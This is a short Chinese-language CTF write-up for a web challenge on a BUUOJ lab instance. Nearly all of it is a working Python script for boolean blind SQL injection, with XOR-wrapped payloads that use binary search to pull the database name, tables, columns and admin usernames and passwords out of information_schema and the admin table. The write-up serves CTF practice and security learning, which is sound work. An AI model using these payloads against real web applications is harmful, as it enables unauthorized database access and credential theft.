# [Black Watch 入群题] Web
# ![1]()
发现可以 SQL 注入,盲注(json 数据需先解码):
import requests
flag = ''
# 查库名
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1' # 库名为news
# 查表名
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' # 表名为admin,contents
# 查字段
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1' # admin表里有id,username,password,is_enable
# contents表里有id,title,content,is_enable
# 查字段值
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1' # 分别查username和password
for i in range(1, 100):
low = 28
high = 137
mid = (low + high) // 2
while (low < high):
url = 'http://8925938b-be36-44ef-a411-70363c14ef36.node5.buuoj.cn:81/backend/content_detail.php?id='
payload = payload4.format(i, mid)
url += payload
print(url)
r = requests.get(url)
text = str(r.json())
if "札师傅缺个女朋友" in text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if (chr(mid) == ''):
break
flag += chr(mid)
print(flag)
print(flag)
# 这个代码使用了id=1时的情况,使用了二分法提高了查询的速度
参考链接:https://blog.csdn.net/qq_46263951/article/details/119059485
